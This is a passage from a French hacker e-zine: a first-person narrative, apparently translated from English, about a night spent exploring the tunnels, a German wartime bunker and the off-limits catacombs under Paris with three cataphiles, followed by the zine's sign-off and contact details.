Pas un bruit. Aucune égoutture. Rien. RIEN!! Je n'ai jamais eprouve quelque chose comme
ca. Vous ne devez pas fermer vos yeux. Le tombeau d'un homme est le refuge d'un autre
homme.

Enfin Emmanuel me demande d' allumer ma lampe-torche pour lui permettre d' allumer
la sienne. Il saisit son sac à dos. Les autres commencent un feu avec du propane
liquide et ouvrent des boites de confit de piment. Nous conversons tranquillement,
en français et anglais. Emmanuel allume et plante une bougie a chaque intersection
du tunnel. Un autre moment magique. Je pense à Robert Smithston. Terrassements
- 30 ans après - cette fois sous la terre. Au retour d' Emmanuel, j' ose poser une
question stupide: 'Pourquoi le faites-vous?' " pour laver mon cerveau, " il ose, suivi
d'un rire explosif. " c'est un autre monde, mais c'est notre monde. Il y a une culture.
Personne ne peut nous toucher ici. "


Quelques km de carriere de pierre a chaux plus tard, nous sautons a cloche-pied une
barriere pour nous retrouver dans une autre carriere. Quelqu'un cultivait des
champignons et collectait des pommes de terre ici. C' etait un veritable desordre
organique, accompagne d' un camion Citroen. Il doit etre 5 ou 6 h du matin, nous
sommes tous fatigues. Nous decidons de nous arreter a cet endroit, caracterise par
des sculptures sur les murs. Nous partimes par des rues desertes de Paris, alors que
l' aube se cassait sur l' horizon de la ville. Benito ronfle profondement sur le
siege arriere; au moins, il maintient Emmanuel eveille. Il mentionne en passant une
soute allemande de la deuxieme guerre mondiale, sous un lycee pres des jardins du
luxembourgeois. Dans les tunnels Le vendredi au soir, j' ai pris le Metro le plus
au sud a la Porte d'Orleans, puis j' ai marche, un peu perdu. Ca n' etait pas sur
ma carte. Emmanuel et deux nouveaux m' attendaient au coin d' une rue de la banlieue.
La scene etait digne de ' L' Exorciste '. Hmmm. Stephane, trentaine d' annees, et
Jean-Baptiste, vingtaine d' annees, se donnent la peine de pratiquer leur anglais,
et me controlent poliment a l' exterieur. Oui, je peux consacrer 8 a 9 heures de mon
temps. Oui, je peux continuer. J' avais l' impression que la nuit precedente n' etait
en fait qu' un test pour quelque chose.... d' important, de serieux. C' etaient des
caves. A present ce sont des tunnels. Il y a une difference. Et, encore une fois,
le rituel. Enfiler les bottes et la tenue dans la rue. Un pieton passe avec son chien,
mais il nous ignore. Mais trois jeunes garcons attachent un velo a un poteau et
inclinent la tete. Ils se dirigent vers une petite entree. Nous les suivons quelques
minutes plus tard. Au milieu de poubelles et de meubles usagers, Emmanuel se fraye
un chemin jusqu' a un mur de briques - notre entree. Notre trou de souris. Cette
fois taille dans un bloc de ciment. Les autres prennent le chemin. L' entree est
vraiment etroite. Je me contorsionne, puis je chute... dans l' obscurite. Je m' etale
au sol, puis m' ecarte. Je ne me blesse pas, et je ne blesse personne, c' est un bon
debut. A gauche, il y a une piece, une sorte de station. Les trois jeunes emergent,
sans avoir l' air etonne. Emmanuel les interroge. Ils n' ont pas de carte. Ils ne vont
pas loin. Ils partent. Ils devraient mieux ne pas aller trop loin s' ils ne veulent
pas se perdre. Notre salle d' attente a une nuance de...rose. Stephane est le coupable,
il a eu un rabais pour un lot de pots de peinture. En fait, il avait deja blanchi un
des murs en surface, mais quelqu' un avait trahi l' entree du tunnel. Ils terminent
tranquillement leurs cigarettes dans le silence. Il est temps de partir.

Les perils
C' est une marche, une marche obligatoire. Nous avons beaucoup de chemin a faire.
Nous suivons le chemin de fer ci-dessus. Vers notre droite sur le mur du tunnel il
y a des supports en metal tenant des cables. Un eglissade ou erreur de calcul et
vous etes empale. Et ces gars bougent vraiment vite. Cela ne prend pas longtemps
pour que je comprenne le probleme. Vous devez suivre la personne qui se tient devant
vous. La postluminescence de sa torche eclaire votre voie. Et dans notre prochain
tunnel le plafond est irregulier et beaucoup plus bas. Nous nous tapissons, marchant
comme des singes. J' essaie de marcher dans les pas de mon predecesseur, comme dans
la neige. Nous marchons dans l' eau, profonde d' environ 40 cm. J' essaie de regler
ma respiration, et de ne pas tomber.C'est beaucoup plus dur que ce que j' avais
imagine. Une fois hors de l' eau, le plafond baissa considerablement. Apres 20 mn
de marche, ce labyrinthe devient incroyable. Il y a beaucoup de tunnels, beaucoup
de choix. Si je les perd ou que je traine, je ne retrouverai jamais mon chemin
arriere. Je pourrais etre delaisse ici a tourner pour toujours. Heureusement mes
guides savent ou ils vont. Je n' ai qu' a continuer.

Mais c' est dur. Il y a tellement de choses a voir, et ils ne s' arrentent que pour
les choses les plus etranges.Comme preciser et commenter le detail architectural le
plus mysterieux. Les pierres angulaires avec les noms et les dates de rue m'intriguent.
Elles sont belles et changent d'une manière extravagante de 1777 à 1890. Mais mes
guides parlent de la construction anarchique du tunnel. Et ils montrent les
graffitis des periodes revolutionnaires - 1789 et 1968. C'est trop étrange! Il
n' y a pas de SDF ici. C' est trop secret, et la police a scelle toutes les
entrees a l' interieur de la ville. J' entends quelque chose - musique? Je
demande aux autres de s' arreter. Silence. Ils ne me croient pas. Nous avoncons
de quelques pas, et ils commencent eux aussi a l' entendre. Emmanuel me pousse
pour se rapprocher de la source sonore. Nous ecoutons. Aucun son. Mais une
lumiere s' approche, accompagnee de voix eloignees. Emmanuel me regarde. "C' est
de l' anglais?"
. Avant que je ne puisse repondre, il maudit les touristes. Quatre
types, quatre filles. Ils amorcent un sourire, et nous saluent dans un anglais casse.
" Avez-vous vu la police? " Nope. " Elle nous a chassee à 'La Plage' ." Emmanuel
semble dubitatif. Ces débutants sont fiers, ils viennent directement d'Allemagne.
Emmanuel se dirige vers moi, et dit " Eh bien, il est Canadien." Le leader appelle
Emmanuel-frère. " Il n'aime pas cela et il reste assez froid avec eux. Ils le sentent
et restent distants aussi. J'ai jeté un coup d'oeil sur la carte de leur guide.
Elle etait vieille et limitee. Emmanuel verifia que ces touristes ne nous suivaient
pas. Pendant que nous marchons, Emmanuel a cette habitude de regarder et verifier
le moindre trou dans les parois. Je devine qu' il y avait autrefois des bougies et
des statues religieuses gardees la, mais personnelement, je prefere ne pas y aventurer
mes mains. Finalement il s' arrete et recupere un morceau de papier au sol. C' est un
tract sur l' extreme speleo/cataphile. C' est vieux et humide. Emmanuel le garde pour
sa collection. Il a des centaines de dessins, schemas, magazines, laisses par les
visiteurs. Ma montre est cachee dans ma poche, ce qui la protege des murs erailles,
mais je n' ai vraiment aucune envie de savoir quelle heure il est. Nous rentrons a
temps, mais par chemin quelque peu illogique. Il y a des milliers de km de souterrain
ici. Nous sommes dans un musee sous-terrain, mais les expositions sont hors
chronologie, 1850, 1777, 1941... J' apercois a present un grafiti fluorescent -
l' annee derniere, la semaine derniere, hier? Apres une longue ligne droite, Stephane
montre un trou dans une paroi du tunnel. "
Bunker - plus tard".

Heureusement ces types s'arpentent. Il est temps de se reposer. Nous entrons dans une
petite caverne. Une fois que nous l'avons eclairee avec des bougies et des lampes mes
guides s'embarquent sur un exercice des plus curieux - plantant des piquets et broyants
les pilliers soutenant cette cave en forme de piece. Ceci me semble assez dangereux.
Cet endroit est creuse dans de la roche incertaine et les piliers sont seulement des
pierres empilées les unes sur les autres. Et, a chaque coup, les parties du plafond
semblent se desagreger et tomber sur nous. Je me retire a l'entree, pret a plonger
dehors dans le tunnel, plus sur. Stephane est le premier a reussir et etire une
bache entre deux piquets. Il s' etend soigneusement dans son hamac improvise tout
en souriant pendant que les autres continuent et echouent malheureusement. Alors un
de ses 2 piquets vole soudainement hors du mur, et il s' ecrase lamentablement sur
le dur sol de la caverne. Nous sommes tous morts de rire. Je suis sous Paris avec
les trois faire-valoir francais. Pour le diner, ils chauffent des boites de confit
de canard et sortent du pain et du vin. J'offre de l' eau et des barres energetiques.
Ils me regardent curieusement. Jean Baptiste: "
hachish? " Je leur suggere de les
garder pour le dessert ;) Stephane est un garcon curieux. Il a passe 4 ans a fusionner
des cartes techniques (je ne me demande meme pas pourquoi ou comment il les a obtenues)
avec ses propres explorations sous-terraines. Toutes les fois que nous trouvons quelque
chose de nouveau, ou quelque chose d' etrange, il l' annote sur un cahier. La carte
entière est un fichier géant de Photoshop qu'il a imprimé en Suisse. Alors qu'elle est
noire et blanche, elle montre plus de six niveaux. Le reve de Stephane est de produire
une version en couleur. Pourquoi la fait-il? Puisque personne d'autre ne l' a fait.
Puisqu'il est la. Et a propos de sa famille? Il a deja emmene deux de ces gamins dans
des caves. Ils ont aime. Emmanuel nous decrit une rencontre avec un couple plutot
etrange et un enfant de 10 ans dans les tunnels l' annee derniere. Je demande si
c' est frequent qu' ils rencontrent des gens ici. Souvent personne, parfois un ou
deux voyageurs. Aucun d'eux n'a rencontré la police redoutee du tunnel. Emmanuel est
sceptique a propos

  
de la course-poursuite des allemands. Je lui demande s' il n' est
jamais devenu un peu fou. Il me repond que ca lui etait deja arrive d' entendre du
reggae et de voir des lumieres quand il venait seul. Jean Baptiste est d' un type
plus silencieux; plus jeune que Stephane, moins obsede. Il me confie qu' il a une
liberte ici qui n'existe pas en haut. Et j'ai le sentiment que c' est un homme
différent ici. Lors des voyages de camping vous vous asseyez en arriere et ecoutez
le vent dans les arbres ou les animaux eloignes. Vous vous prenez dans le silence
noir. Je ne sais pas pour combien de temps nous nous asseyons la.

Le Bunker
La methode pour entrer est assez simple, mais c' est aussi comique: vous passez
la tete la premiere, et votre coequipier vous pousse a travers. Les tunnels changent
encore d' architecture. Nous sommes censes etre sous un lycee. Nous sommes censément
sous un lycée. Je devine que les gosses ne se rendent jamais ici. Mais les Allemands
l' ont fait. La plupart des vestiges des Nazis sont maintenant partis du bunker, mais
il reste des avertissements, comme " RAUCHEN VERBOTEN ", et des portes scellees en
metal qui ressemblent a celles d' un sous-marin U2. Et il y a beaucoup de salles -
petites salles. Je n' ose imaginer a quoi elles servaient.

Emmanuel sort du tunnel pour entrer dans un Bunker.
Il y a beaucoup de cables electriques et de conduits montes sur les murs - ce qui
me laisse penser que c' etait un Bunker de transmissions. Mes yeux commencent a
s' acoutumer, et je peux observer une trame de metal blanc dans une autre piece.
Les lamelles en bois se sont desagregees et se sont dissoutes dans le plancher en
pierre. Tout le monde est silencieux, chacun observe seul. Stephane se dirige a une
fissure dans le mur. Je suis sur de ne pas passer cette fois, mais il y est deja
parti. Les autres regardent pour voir si je suivrai. Je me lance finalement, apres
avoir jete mon sac a terre. Il faut grimper, puis ramper vers le bas. J' ai environ
10 cm de jeu de chaque cote. Je ne me suis jamais autant senti enterre vivant. Et il
n'y a aucune extremite en vue. La plus legere secousse, et nous sommes tous ecrases.
Personne ne nous entendra. Personne ne nous trouvera. Pourquoi est-ce que je fais ca?
Je n'ai pas le temps de repondre. Il y a un type derrière moi et je dois continuer.
Je figure que nous rampons 6 ou 7 m avant la sortie. Je peux gouter la poussiere.
Mes nerfs me massacrent. Mais nous retrouvons le sourire a la sortie. Ce stupide
sourire que les hommes esquissent lorsqu' ils ont fait quelque chose de viril
ensemble. Nous sommes de retour dans les tunnels.

Nouveaux Tunnels?
Je me depeche pour rattraper mes trois camarades a la prochaine
intersection. Il n'y a aucun repere de rue. Stephane etudie sa carte. Jean Baptiste
la saisit, la tourne a 180 degres - le signe international du désaccord spatial. Ils
discutent. Je n'ai besoin d'aucune traduction. Je sais qu'aucun d'eux ne porte une
boussole. Clairement, nous sommes detruits. La plupart des hommes paniqueraient. Ces
trois-ci sont hyper-joyeux. Territoire inconnu! Stephane me sourit. En me prenant
avec eux, ils ont ete recompenses. J'ai porte bonheur. Je suis neanmoins tres
inquiet, et mes genoux tremblent. Nous sommes de veritables explorateurs maintenant.
A chaque intersection, Stephane trace une serie de lignes sur sa carte. Ces tunnels
semblent... differents. Ils ne sont pas lisses, et il y a des signes d' eboulements.
Emmanuel pousse tout a coup un cri aigu, et me dit de m' approcher. Il est suspendu
au-dessus d' un bassin d' eau totalement claire. Il me dit que personne n' est venu
ici depuis tres longtemps. Comme nos cartographes continuent leur travail, je me
tourne vers Emmanuel pour quelques renseignements. Il me raconte que ce sont des
tunnels d' essais, pour controler les fondations des batiments voisins et
l' uniformite de la terre. Ils ont probablement estime qu' il etait trop dangereux
de les construire ici.

Stephane est si fier de sa nouvelle decouverte. La fatigue me gange, les grimaces
aussi. Meme ces types ont leurs limites. Les boulots en surface et la colere des
epouses fachees reviennent en memoire. Mais Emmanuel est honorable en un point.
Il me demande si je veux toujours voir les vraies catacombes? Je ne me demonte pas.
" Mais bien sur ", je réponds. Les autres sourient, fiers de moi. Mais ils pensent
a leurs foyers. Les vraies Catacombes Il n' y eut plus beaucoup d' arrets, ainsi
quand celui-ci s' est presente de lui-meme, nous nous sommes assis. Au milieu de
la salle se trouve un escalier miniature, une sculpture. Quelque chose de fait
avec les 15 genres de pierre de la zone. Stephane et Jean Baptiste se concentrent
pour fournir a Emmanuel les sections adequates de la carte pour faciliter notre
retour. J'entends encore cette musique. Mais avant que je ne puisse reagir, ils
etaient la - nos huit touristes allemands continuant leur chemin. Ils nous
rejoignent et choisissent Emmanuel pour prendre leur photo. Puis, de nouveau,
ils partirent aussi rapidement qu'ils etaient apparus. Nous observons leur
lumière disparaitre en bas du mur de tunnel. Nous zig-zagons pendant un moment
puis suivons alors quelques escaliers en pierre antiques vers un autre niveau.
Les vrais catacombes ne sont pas aussi ordonnees que la version des touristes.
Aucunes croix faites à partir des lignes des crânes ici. Des os sont repandus
aux environs. Alors Emmanuel me montre les galeries laterales. Les os ont ete
empiles pour toujours sur 60 a 80 cm de hauteur dans des tunnels qui vont...
dans l'obscurité. Il y a une paire de gants de latex a l'entree. Emmanuel est
silencieux. C'est l' endroit ou les tares viennent, me dit-il. J' ai peur de
demander pourquoi. Il semble que quelques-uns prennent leur pied a se jeter
sur ce tas d' os. Surfer dans le puits de l' humanite. Je regrette de ne pas
avoir demande maintenant. Tellement de choses a voir, si peu de temps. Mais
nous pensons a nos foyers. Peut-etre une heure et demie si nous nous deplacons
vite. Mais Emmanuel est nerveux. Il veut eviter 'La Plage', vu que les Allemands
les ont avertis que les flics rodaient dans ce coin. Nous n' allons prendre
aucun risque, et nous empruntons un detour. Mon guide est finalement heureux
de pouvoir controler. Plusieurs fois Emmanuel regarde sa carte. Puis soudainement
deux jeunes types - d' une vingtaine d' annees - passent. Ce sont des hommes en
mission. Un simple " Salut " et ils continuent leur chemin. Emmanuel montre peu
d'interet a les suivre. Nous continuons sur notre chemin, mais nous sommes perdus
pendant un moment. Enfin il consulte la carte une fois de plus, puis m'assure que
nous sommes seulement a une demi-heure de la fin. Quand nous frappons l'eau il
tout revient. Cette fois je glisse. Nous nous precipitons. Je suis fatigue,
impatient. Je me cogne la tete. Emmanuel se retourne, il l'a entendu. Je sens le
sang mais j'incline la tete et nous continuons en fonction. Je prends appuis avec
ma main sur le mur, en evitant les metaux. On se trouvait a present dehors.
Emmanuel me laisse partir. Triste de dire " au revoir " a mon guide, mon aventurier
de camarade, mais nous sommes tous les deux fatigues. Et il est un homme de peu
de mots. Nous sourions, inclinons la tete. " A la prochaine". " A plus tard ".
Emmanuel conduit en surface comme il voyage en-dessous. Des cris, des
manifestations etranges. Je suis sur un des premiers trains du nord. Mes cheveux
sont en desordre, je suis couvert de salete. C'est une merveille qu'ils ne
m'arretent pas. Mais personne n' en prend note. J'ai juste passe dix heures sous
Paris avec un groupe de cataphiles fous, de trafiquants de drogue et de touristes
extremes. Devant moi maintenant, premiers banlieusards de matin. Je sais que
je suis remonte, mais alors que le metro accelere je me rappelle ou je suis vraiment.
Il n' y a juste qu' une foule en plus, mais nous sommes encore sous terre.

[ pour vous servir: vatoo]



(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Ze End !!! ) 2.13 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


Voila pour ce deuxieme numero de notre zine. On espere sincerement qu' il vous
aura plu, que vous lui ferez de la pub, que vous lirez le prochain, et surtout
que vous participiez! On insiste bien sur le fait que vous pouvez nous contatcer
tres librement, en venant sur notre chann (#cryptel / IRCNet), en vous exprimant
sur le forum de notre site (http://www.altern.org/cryptel bah oui, notre domaine
est mort :( ), ou en nous envoyant un petit mail a cryptel@altern.org . . .
Si vous avez des idees originales d' articles, des sujets, des demandes, ou des
textes a nous soumettre, c' est cette email qu' il faut utiliser.

And don' t forget to defonce your head the 31 december!!!

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT